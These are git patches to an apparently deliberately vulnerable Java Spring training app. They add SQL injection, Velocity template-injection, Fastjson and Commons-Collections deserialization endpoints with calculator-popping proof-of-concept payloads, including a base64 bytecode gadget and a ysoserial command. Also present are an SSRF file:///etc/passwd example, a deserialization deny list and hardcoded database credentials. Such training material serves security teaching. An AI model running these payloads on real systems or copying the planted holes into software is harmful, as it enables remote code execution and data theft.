org.mybatis.spring.boot + mybatis-spring-boot-starter + 1.3.2 + + diff --git a/src/main/java/org/joychou/controller/SQLI.java b/src/main/java/org/joychou/controller/SQLI.java index a65b8ba8..a4344b85 100644 --- a/src/main/java/org/joychou/controller/SQLI.java +++ b/src/main/java/org/joychou/controller/SQLI.java @@ -1,9 +1,10 @@ package org.joychou.controller; -import org.springframework.stereotype.Controller; -import org.springframework.web.bind.annotation.RequestMapping; -import org.springframework.web.bind.annotation.ResponseBody; +import org.joychou.mapper.UserMapper; +import org.joychou.dao.User; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.web.bind.annotation.*; import javax.servlet.http.HttpServletRequest; import java.sql.*; @@ -15,44 +16,46 @@ * @desc SQL Injection */ -@Controller +@RestController @RequestMapping("/sqli") public class SQLI { - @RequestMapping("/jdbc") - @ResponseBody - public static String jdbc_sqli(HttpServletRequest request){ + private static String driver = "com.mysql.jdbc.Driver"; + private static String url = "jdbc:mysql://localhost:3306/java_sec_code"; + private static String user = "root"; + private static String password = "woshishujukumima"; - String name = request.getParameter("name"); - String driver = "com.mysql.jdbc.Driver"; - String url = "jdbc:mysql://localhost:3306/sectest"; - String user = "root"; - String password = "woshishujukumima"; + @Autowired + private UserMapper userMapper; + + + /** + * Vul Code. + * http://localhost:8080/sqli/jdbc/vul?username=joychou + * + * @param username username + */ + @RequestMapping("/jdbc/vul") + public static String jdbc_sqli_vul(@RequestParam("username") String username){ String result = ""; try { Class.forName(driver); - Connection con = DriverManager.getConnection(url,user,password); + Connection con = DriverManager.getConnection(url, user, password); if(!con.isClosed()) System.out.println("Connecting to Database successfully."); // sqli vuln code 漏洞代码 Statement statement = con.createStatement(); - String sql = "select * from users where name = '" + name + "'"; + String sql = "select * from users where username = '" + username + "'"; System.out.println(sql); ResultSet rs = statement.executeQuery(sql); - // fix code 用预处理修复SQL注入 -// String sql = "select * from users where name = ?"; -// PreparedStatement st = con.prepareStatement(sql); -// st.setString(1, name); -// System.out.println(st.toString()); // 预处理后的sql -// ResultSet rs = st.executeQuery(); System.out.println("-----------------"); while(rs.next()){ - String res_name = rs.getString("name"); + String res_name = rs.getString("username"); String res_pwd = rs.getString("password"); result += res_name + ": " + res_pwd + "\n"; System.out.println(res_name + ": " + res_pwd); @@ -77,4 +80,94 @@ public static String jdbc_sqli(HttpServletRequest request){ return result; } + + /** + * Security Code. + * http://localhost:8080/sqli/jdbc/sec?username=joychou + * + * @param username username + */ + @RequestMapping("/jdbc/sec") + public static String jdbc_sqli_sec(@RequestParam("username") String username){ + + String result = ""; + try { + Class.forName(driver); + Connection con = DriverManager.getConnection(url, user, password); + + if(!con.isClosed()) + System.out.println("Connecting to Database successfully."); + + + // fix code + String sql = "select * from users where username = ?"; + PreparedStatement st = con.prepareStatement(sql); + st.setString(1, username); + System.out.println(st.toString()); // sql after prepare statement + ResultSet rs = st.executeQuery(); + + System.out.println("-----------------"); + + while(rs.next()){ + String res_name = rs.getString("username"); + String res_pwd = rs.getString("password"); + result += res_name + ": " + res_pwd + "\n"; + System.out.println(res_name + ": " + res_pwd); + + } + rs.close(); + con.close(); + + + }catch (ClassNotFoundException e) { + System.out.println("Sorry,can`t find the Driver!"); + e.printStackTrace(); + }catch (SQLException e) { + e.printStackTrace(); + }catch (Exception e) { + e.printStackTrace(); + + }finally{ + System.out.println("-----------------"); + System.out.println("Connect database done."); + } + return result; + } + + + /** + * security code + * http://localhost:8080/sqli/mybatis/sec01?username=joychou + * + * @param username username + */ + @GetMapping("/mybatis/sec01") + public User mybatis_vul1(@RequestParam("username") String username) { + return userMapper.findByUserName(username); + } + + + + /** + * security code + * http://localhost:8080/sqli/mybatis/sec02?id=1 + * + * @param id id + */ + @GetMapping("/mybatis/sec02") + public User mybatis_v(@RequestParam("id") Integer id) { + return userMapper.findById(id); + } + + + /** + * security code + * http://localhost:8080/sqli/mybatis/sec03 + **/ + @GetMapping("/mybatis/sec03") + public User mybatis_vul2() { + return userMapper.OrderByUsername(); + } + + } diff --git a/src/main/java/org/joychou/controller/jsonp/JSONP.java b/src/main/java/org/joychou/controller/jsonp/JSONP.java index f78b2aa8..2f474440 100644 --- a/src/main/java/org/joychou/controller/jsonp/JSONP.java +++ b/src/main/java/org/joychou/controller/jsonp/JSONP.java @@ -57,7 +57,7 @@ private static String emptyReferer(HttpServletRequest request, HttpServletRespon /** * Adding callback or cback on parameter can automatically return jsonp data. * http://localhost:8080/jsonp/advice?callback=test - * http://localhost:8080/jsonp/advice?cback=test + * http://localhost:8080/jsonp/advice?_callback=test * * @return Only return object, AbstractJsonpResponseBodyAdvice can be used successfully. * Such as JSONOjbect or JavaBean. String type cannot be used. diff --git a/src/main/java/org/joychou/dao/User.java b/src/main/java/org/joychou/dao/User.java new file mode 100644 index 00000000..b9bc8341 --- /dev/null +++ b/src/main/java/org/joychou/dao/User.java @@ -0,0 +1,34 @@ +package org.joychou.dao; + +import java.io.Serializable; + +public class User implements Serializable { + private static final long serialVersionUID = 1L; + private Integer id; + private String username; + private String password; + + public Integer getId() { + return id; + } + public void setId(Integer id) { + this.id = id; + } + + + public String getUsername() { + return username; + } + public void setUsername(String username) { + this.username = username; + } + + + public String getPassword() { + return password; + } + public void setPassword(String password) { + this.password = password; + } + +} diff --git a/src/main/java/org/joychou/mapper/UserMapper.java b/src/main/java/org/joychou/mapper/UserMapper.java new file mode 100644 index 00000000..33114048 --- /dev/null +++ b/src/main/java/org/joychou/mapper/UserMapper.java @@ -0,0 +1,18 @@ +package org.joychou.mapper; + +import org.apache.ibatis.annotations.Mapper; +import org.apache.ibatis.annotations.Param; +import org.apache.ibatis.annotations.Select; +import org.joychou.dao.User; + +@Mapper +public interface UserMapper { + + // If using simple sql, we can use annotation. + @Select("select * from users where username = #{username}") + User findByUserName(@Param("username") String username); + + User findById(Integer id); + + User OrderByUsername(); +} diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties index ddf4d13b..c37be3fa 100644 --- a/src/main/resources/application.properties +++ b/src/main/resources/application.properties @@ -1,4 +1,11 @@ +spring.datasource.url=jdbc:mysql://127.0.0.1:3306/java_sec_code?useUnicode=true&characterEncoding=utf8&useSSL=false&serverTimezone=GMT%2B8 +spring.datasource.username=root +spring.datasource.password=woshishujukumima +spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver +mybatis.mapper-locations=classpath:mapper/*.xml + + # Spring Boot Actuator Vulnerable Config management.security.enabled=false # logging.config=classpath:logback-online.xml diff --git a/src/main/resources/mapper/UserMapper.xml b/src/main/resources/mapper/UserMapper.xml new file mode 100644 index 00000000..dd88f424 --- /dev/null +++ b/src/main/resources/mapper/UserMapper.xml @@ -0,0 +1,23 @@ + + + + + + + + + + + + + + + + + + + \ No newline at end of file From 839f5328e7ce5ccfa5ad8635262e6334113fbf9b Mon Sep 17 00:00:00 2001 From: JoyChou Date: Fri, 19 Jul 2019 17:27:29 +0800 Subject: [PATCH 06/67] Add ssti & resolveClass blacklist --- README.md | 1 + README_zh.md | 1 + java-sec-code.iml | 1 + pom.xml | 7 ++ .../java/org/joychou/controller/Fastjson.java | 10 ++- .../java/org/joychou/controller/SSTI.java | 37 +++++++++ .../java/org/joychou/controller/Test.java | 4 +- .../java/org/joychou/mapper/UserMapper.java | 5 +- .../security/AntObjectInputStream.java | 78 +++++++++++++++++++ src/main/resources/application.properties | 2 +- 10 files changed, 139 insertions(+), 7 deletions(-) create mode 100644 src/main/java/org/joychou/controller/SSTI.java create mode 100644 src/main/java/org/joychou/security/AntObjectInputStream.java diff --git a/README.md b/README.md index b1f4b020..3b35747f 100644 --- a/README.md +++ b/README.md @@ -29,6 +29,7 @@ Sort by letter. - [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java) - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java) - [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java) +- [SSTI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSTI.java) - [URL Redirect](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLRedirect.java) - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLWhiteList.java) - [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java) diff --git a/README_zh.md b/README_zh.md index e5d00569..70bbaedf 100644 --- a/README_zh.md +++ b/README_zh.md @@ -26,6 +26,7 @@ - [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java) - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java) - [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java) +- [SSTI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSTI.java) - [URL Redirect](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLRedirect.java) - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLWhiteList.java) - [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java) diff --git a/java-sec-code.iml b/java-sec-code.iml index 10a8f2b2..9cb2ac16 100644 --- a/java-sec-code.iml +++ b/java-sec-code.iml @@ -180,5 +180,6 @@ + \ No newline at end of file diff --git a/pom.xml b/pom.xml index 1c13246a..99e59ea0 100644 --- a/pom.xml +++ b/pom.xml @@ -177,6 +177,13 @@ 1.3.2 + + + org.apache.velocity + velocity + 1.7 + + diff --git a/src/main/java/org/joychou/controller/Fastjson.java b/src/main/java/org/joychou/controller/Fastjson.java index 6609ad54..684ee253 100644 --- a/src/main/java/org/joychou/controller/Fastjson.java +++ b/src/main/java/org/joychou/controller/Fastjson.java @@ -2,6 +2,7 @@ import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.JSONObject; +import com.alibaba.fastjson.parser.Feature; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.RequestBody; import org.springframework.web.bind.annotation.RequestMapping; @@ -29,9 +30,10 @@ public static String Deserialize(@RequestBody String params) { } } - public static void main(String[] args){ - String str = "{\"name\": \"fastjson\"}"; - JSONObject jo = JSON.parseObject(str); - System.out.println(jo.get("name")); // fastjson + public static void main(String[] args) { + + // Open calc in mac + String payload = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\", \"_bytecodes\": [\"yv66vgAAADEAOAoAAwAiBwA2BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQAzTG1lL2xpZ2h0bGVzcy9mYXN0anNvbi9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQ7AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHACcBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAClNvdXJjZUZpbGUBAAhFeHAuamF2YQwACgALBwAoAQAxbWUvbGlnaHRsZXNzL2Zhc3Rqc29uL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAHW1lL2xpZ2h0bGVzcy9mYXN0anNvbi9HYWRnZXRzAQAIPGNsaW5pdD4BABFqYXZhL2xhbmcvUnVudGltZQcAKgEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMACwALQoAKwAuAQASb3BlbiAtYSBDYWxjdWxhdG9yCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA9saWdodGxlc3MvcHduZXIBABFMbGlnaHRsZXNzL3B3bmVyOwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAADwADgAAAAwAAQAAAAUADwA3AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAAD8ADgAAACAAAwAAAAEADwA3AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAAEIADgAAACoABAAAAAEADwA3AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAABsAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAAAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACQ==\"], \"_name\": \"lightless\", \"_tfactory\": { }, \"_outputProperties\":{ }}"; + JSONObject object = JSON.parseObject(payload, Feature.SupportNonPublicField); } } diff --git a/src/main/java/org/joychou/controller/SSTI.java b/src/main/java/org/joychou/controller/SSTI.java new file mode 100644 index 00000000..7e9d2edb --- /dev/null +++ b/src/main/java/org/joychou/controller/SSTI.java @@ -0,0 +1,37 @@ +package org.joychou.controller; + + +import org.apache.velocity.VelocityContext; +import org.springframework.web.bind.annotation.GetMapping; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RestController; + +import org.apache.velocity.app.Velocity; + +import java.io.StringWriter; + +@RestController +@RequestMapping("/ssti") +public class SSTI { + + /** + * SSTI of Java velocity. + * Open a calculator in MacOS. + * http://localhost:8080/ssti/velocity?template=%23set($e=%22e%22);$e.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22open%20-a%20Calculator%22) + * + * @param template exp + */ + @GetMapping("/velocity") + private static void velocity(String template){ + Velocity.init(); + + VelocityContext context = new VelocityContext(); + + context.put("author", "Elliot A."); + context.put("address", "217 E Broadway"); + context.put("phone", "555-1337"); + + StringWriter swOut = new StringWriter(); + Velocity.evaluate(context, swOut, "test", template); + } +} diff --git a/src/main/java/org/joychou/controller/Test.java b/src/main/java/org/joychou/controller/Test.java index b7374f1d..902b2269 100644 --- a/src/main/java/org/joychou/controller/Test.java +++ b/src/main/java/org/joychou/controller/Test.java @@ -5,6 +5,7 @@ import org.springframework.web.bind.annotation.ResponseBody; import javax.servlet.http.Cookie; +import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; @Controller @@ -13,8 +14,9 @@ public class Test { @RequestMapping(value = "/") @ResponseBody - private String Index(HttpServletResponse response) { + private String Index(HttpServletResponse response, String empId) { + System.out.println(empId); Cookie cookie = new Cookie("XSRF-TOKEN", "123"); cookie.setDomain("taobao.com"); cookie.setMaxAge(-1); // forever time diff --git a/src/main/java/org/joychou/mapper/UserMapper.java b/src/main/java/org/joychou/mapper/UserMapper.java index 33114048..36c2f734 100644 --- a/src/main/java/org/joychou/mapper/UserMapper.java +++ b/src/main/java/org/joychou/mapper/UserMapper.java @@ -8,7 +8,10 @@ @Mapper public interface UserMapper { - // If using simple sql, we can use annotation. + /** + * If using simple sql, we can use annotation. Such as @Select @Update. + * If using ${username}, application will send a error. + */ @Select("select * from users where username = #{username}") User findByUserName(@Param("username") String username); diff --git a/src/main/java/org/joychou/security/AntObjectInputStream.java b/src/main/java/org/joychou/security/AntObjectInputStream.java new file mode 100644 index 00000000..d837b4c1 --- /dev/null +++ b/src/main/java/org/joychou/security/AntObjectInputStream.java @@ -0,0 +1,78 @@ +package org.joychou.security; + +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; + +import java.io.*; + +/** + * RASP:Hook java/io/ObjectInputStream类的resolveClass方法 + * RASP: https://github.com/baidu/openrasp/blob/master/agent/java/engine/src/main/java/com/baidu/openrasp/hook/DeserializationHook.java + * + * Run main method to test. + */ +public class AntObjectInputStream extends ObjectInputStream { + + private final Logger logger= LoggerFactory.getLogger(AntObjectInputStream.class); + + public AntObjectInputStream(InputStream inputStream) throws IOException { + super(inputStream); + } + + /** + * 只允许反序列化SerialObject class + * + * 在应用上使用黑白名单校验方案比较局限,因为只有使用自己定义的AntObjectInputStream类,进行反序列化才能进行校验。 + * 类似fastjson通用类的反序列化就不能校验。 + * 但是RASP是通过HOOK java/io/ObjectInputStream类的resolveClass方法,全局的检测白名单。 + * + */ + @Override + protected Class resolveClass(final ObjectStreamClass desc) + throws IOException, ClassNotFoundException + { + String className = desc.getName(); + + // Deserialize class name: org.joychou.security.AntObjectInputStream$MyObject + logger.info("Deserialize class name: " + className); + + String[] denyClasses = {"java.net.InetAddress", "org.apache.commons.collections.Transformer"}; + + for (String denyClass : denyClasses) { + if (className.startsWith(denyClass)) { + throw new InvalidClassException("Unauthorized deserialization attempt", className); + } + } + + return super.resolveClass(desc); + } + + public static void main(String args[]) throws Exception{ + // 定义myObj对象 + MyObject myObj = new MyObject(); + myObj.name = "world"; + + // 创建一个包含对象进行反序列化信息的/tmp/object数据文件 + FileOutputStream fos = new FileOutputStream("/tmp/object"); + ObjectOutputStream os = new ObjectOutputStream(fos); + + // writeObject()方法将myObj对象写入/tmp/object文件 + os.writeObject(myObj); + os.close(); + + // 从文件中反序列化obj对象 + FileInputStream fis = new FileInputStream("/tmp/object"); + AntObjectInputStream ois = new AntObjectInputStream(fis); // AntObjectInputStream class + + //恢复对象即反序列化 + MyObject objectFromDisk = (MyObject)ois.readObject(); + System.out.println(objectFromDisk.name); + ois.close(); + } + + static class MyObject implements Serializable { + public String name; + } +} + + diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties index c37be3fa..9cf68432 100644 --- a/src/main/resources/application.properties +++ b/src/main/resources/application.properties @@ -24,7 +24,7 @@ joychou.security.referer.uri = /jsonp/** # csrf token check joychou.security.csrf.enabled = true # URI without CSRF check (only support ANT url format) -joychou.security.csrf.exclude.url = /xxe/**, /fastjon/** +joychou.security.csrf.exclude.url = /xxe/**, /fastjson/** # method for CSRF check joychou.security.csrf.method = POST ### csrf configuration ends ### From cc99e47c740c029a97ef0aa7d0dee2e2694138d1 Mon Sep 17 00:00:00 2001 From: JoyChou Date: Fri, 19 Jul 2019 17:33:37 +0800 Subject: [PATCH 07/67] udpate readme --- README.md | 1 + README_zh.md | 1 + src/main/java/org/joychou/controller/SSTI.java | 6 ++++-- 3 files changed, 6 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 3b35747f..6f2e11f2 100644 --- a/README.md +++ b/README.md @@ -46,6 +46,7 @@ Sort by letter. - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP) - [SQLI](https://github.com/JoyChou93/java-sec-code/wiki/SQL-Inject) - [SSRF](https://github.com/JoyChou93/java-sec-code/wiki/SSRF) +- [SSTI](https://github.com/JoyChou93/java-sec-code/wiki/SSTI) - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass) - [XXE](https://github.com/JoyChou93/java-sec-code/wiki/XXE) - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others) diff --git a/README_zh.md b/README_zh.md index 70bbaedf..9ae1820f 100644 --- a/README_zh.md +++ b/README_zh.md @@ -43,6 +43,7 @@ - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP) - [SQLI](https://github.com/JoyChou93/java-sec-code/wiki/SQL-Inject) - [SSRF](https://github.com/JoyChou93/java-sec-code/wiki/SSRF) +- [SSTI](https://github.com/JoyChou93/java-sec-code/wiki/SSTI) - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass) - [XXE](https://github.com/JoyChou93/java-sec-code/wiki/XXE) - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others) diff --git a/src/main/java/org/joychou/controller/SSTI.java b/src/main/java/org/joychou/controller/SSTI.java index 7e9d2edb..70e7c7a6 100644 --- a/src/main/java/org/joychou/controller/SSTI.java +++ b/src/main/java/org/joychou/controller/SSTI.java @@ -15,9 +15,11 @@ public class SSTI { /** - * SSTI of Java velocity. - * Open a calculator in MacOS. + * SSTI of Java velocity. The latest Velocity version still has this problem. + * Fix method: Avoid to use Velocity.evaluate method. + * * http://localhost:8080/ssti/velocity?template=%23set($e=%22e%22);$e.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22open%20-a%20Calculator%22) + * Open a calculator in MacOS. * * @param template exp */ From 31f51708ed3de9c101093ad38712f54728704e34 Mon Sep 17 00:00:00 2001 From: JoyChou Date: Sat, 20 Jul 2019 12:24:28 +0800 Subject: [PATCH 08/67] add deserialize --- java-sec-code.iml | 2 +- .../org/joychou/controller/Deserialize.java | 104 ++++++++++++++---- .../java/org/joychou/controller/SSRF.java | 3 + .../security/AntObjectInputStream.java | 4 +- 4 files changed, 91 insertions(+), 22 deletions(-) diff --git a/java-sec-code.iml b/java-sec-code.iml index 9cb2ac16..0278f6c0 100644 --- a/java-sec-code.iml +++ b/java-sec-code.iml @@ -12,7 +12,7 @@ - + diff --git a/src/main/java/org/joychou/controller/Deserialize.java b/src/main/java/org/joychou/controller/Deserialize.java index 964a7777..d597087c 100644 --- a/src/main/java/org/joychou/controller/Deserialize.java +++ b/src/main/java/org/joychou/controller/Deserialize.java @@ -1,35 +1,99 @@ package org.joychou.controller; - -import org.springframework.stereotype.Controller; +import org.apache.commons.lang.StringUtils; +import org.joychou.security.AntObjectInputStream; +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; import org.springframework.web.bind.annotation.RequestMapping; -import org.springframework.web.bind.annotation.ResponseBody; +import org.springframework.web.bind.annotation.RestController; +import javax.servlet.http.Cookie; import javax.servlet.http.HttpServletRequest; -import java.io.InputStream; +import java.io.ByteArrayInputStream; +import java.io.IOException; import java.io.ObjectInputStream; +import java.util.Base64; /** - * @author JoyChou (joychou@joychou.org) - * @Date 2018年06月14日 - * @Desc 该应用必须有Commons-Collections包才能利用反序列化命令执行。 + * Deserialize RCE using Commons-Collections gadget. + * + * @author JoyChou @2018-06-14 */ - -@Controller +@RestController @RequestMapping("/deserialize") public class Deserialize { - @RequestMapping("/test") - @ResponseBody - public static String deserialize_test(HttpServletRequest request) throws Exception{ - try { - InputStream iii = request.getInputStream(); - ObjectInputStream in = new ObjectInputStream(iii); - in.readObject(); // 触发漏洞 - in.close(); - return "test"; - }catch (Exception e){ - return "exception"; + + private static Logger logger= LoggerFactory.getLogger(Deserialize.class); + + /** + * java -jar ysoserial.jar CommonsCollections5 "open -a Calculator" | base64 + * Add the result to rememberMe cookie. + * + * http://localhost:8080/deserialize/rememberMe/vul + */ + @RequestMapping("/rememberMe/vul") + public static String rememberMeVul(HttpServletRequest request) + throws IOException, ClassNotFoundException { + + Cookie[] cookies = request.getCookies(); + String rememberMe = ""; + + if (null == cookies) { + logger.info("No cookies."); + } else { + for (Cookie cookie : cookies) { + if ( cookie.getName().equals("rememberMe") ) { + rememberMe = cookie.getValue(); + } + } + } + + if (StringUtils.isBlank(rememberMe) ) { + return "No rememberMe cookie. Right?"; } + + byte[] decoded = Base64.getDecoder().decode(rememberMe); + ByteArrayInputStream bytes = new ByteArrayInputStream(decoded); + ObjectInputStream in = new ObjectInputStream(bytes); + in.readObject(); + in.close(); + + return "Are u ok?"; + } + + /** + * Check deserialize class using black list. + * + * http://localhost:8080/deserialize/rememberMe/security + */ + @RequestMapping("/rememberMe/security") + public static String rememberMeBlackClassCheck(HttpServletRequest request) + throws IOException, ClassNotFoundException { + + Cookie[] cookies = request.getCookies(); + String rememberMe = ""; + + if (null == cookies) { + logger.info("No cookies in /rememberMe/security"); + } else { + for (Cookie cookie : cookies) { + if ( cookie.getName().equals("rememberMe") ) { + rememberMe = cookie.getValue(); + } + } + } + + if (StringUtils.isBlank(rememberMe) ) { + return "No rememberMe cookie. Right?"; + } + + byte[] decoded = Base64.getDecoder().decode(rememberMe); + ByteArrayInputStream bytes = new ByteArrayInputStream(decoded); + AntObjectInputStream in = new AntObjectInputStream(bytes); + in.readObject(); + in.close(); + + return "I'm very OK."; } } diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java index f774fb27..fec5cf23 100644 --- a/src/main/java/org/joychou/controller/SSRF.java +++ b/src/main/java/org/joychou/controller/SSRF.java @@ -103,6 +103,9 @@ public static String ssrf_Request(HttpServletRequest request) * Download the url file. * http://localhost:8080/ssrf/openStream?url=file:///etc/passwd * + * new URL(String url).openConnection() + * new URL(String url).openStream() + * new URL(String url).getContent() */ @RequestMapping("/openStream") @ResponseBody diff --git a/src/main/java/org/joychou/security/AntObjectInputStream.java b/src/main/java/org/joychou/security/AntObjectInputStream.java index d837b4c1..b15d7589 100644 --- a/src/main/java/org/joychou/security/AntObjectInputStream.java +++ b/src/main/java/org/joychou/security/AntObjectInputStream.java @@ -36,7 +36,9 @@ protected Class resolveClass(final ObjectStreamClass desc) // Deserialize class name: org.joychou.security.AntObjectInputStream$MyObject logger.info("Deserialize class name: " + className); - String[] denyClasses = {"java.net.InetAddress", "org.apache.commons.collections.Transformer"}; + String[] denyClasses = {"java.net.InetAddress", + "org.apache.commons.collections.Transformer", + "org.apache.commons.collections.functors"}; for (String denyClass : denyClasses) { if (className.startsWith(denyClass)) { From 0a9c97825e216fed465f267a545ce365f751bc73 Mon Sep 17 00:00:00 2001 From: JoyChou Date: Sat, 20 Jul 2019 12:25:56 +0800 Subject: [PATCH 09/67] update readme --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 6f2e11f2..b273bf10 100644 --- a/README.md +++ b/README.md @@ -41,6 +41,7 @@ Sort by letter. - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/wiki/Actuators-to-RCE) - [CORS](https://github.com/JoyChou93/java-sec-code/wiki/CORS) - [CSRF](https://github.com/JoyChou93/java-sec-code/wiki/CSRF) +- [Deserialize](https://github.com/JoyChou93/java-sec-code/wiki/Deserialize) - [Fastjson](https://github.com/JoyChou93/java-sec-code/wiki/Fastjson) - [Java RMI](https://github.com/JoyChou93/java-sec-code/wiki/Java-RMI) - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP) From 4763a3a3938d3e0b0775dc0ffb895e7fe13ce7b9 Mon Sep 17 00:00:00 2001 From: JoyChou Date: Sat, 20 Jul 2019 12:26:26 +0800 Subject: [PATCH 10/67] update readme --- README_zh.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README_zh.md b/README_zh.md index 9ae1820f..88d31149 100644 --- a/README_zh.md +++ b/README_zh.md @@ -38,6 +38,7 @@ - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/wiki/Actuators-to-RCE) - [CORS](https://github.com/JoyChou93/java-sec-code/wiki/CORS) - [CSRF](https://github.com/JoyChou93/java-sec-code/wiki/CSRF) +- [Deserialize](https://github.com/JoyChou93/java-sec-code/wiki/Deserialize) - [Fastjson](https://github.com/JoyChou93/java-sec-code/wiki/Fastjson) - [Java RMI](https://github.com/JoyChou93/java-sec-code/wiki/Java-RMI) - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP) From 8a9977d02a03ac62ab6aad8e96d8534e4c443478 Mon Sep 17 00:00:00 2001 From: JoyChou Date: Mon, 22 Jul 2019 00:07:50 +0800 Subject: [PATCH 11/67] add auth --- README.md | 21 ++++ README_zh.md | 20 ++++ .../java/org/joychou/controller/CORS.java | 14 +-- .../java/org/joychou/controller/CSRF.java | 12 +- .../java/org/joychou/controller/Index.java | 10 +- .../java/org/joychou/controller/Login.java | 58 ++++++++++ .../org/joychou/controller/jsonp/JSONP.java | 32 ++++-- .../security/AntObjectInputStream.java | 2 +- .../security/CsrfAccessDeniedHandler.java | 2 +- .../joychou/security/LoginFailureHandler.java | 32 ++++++ 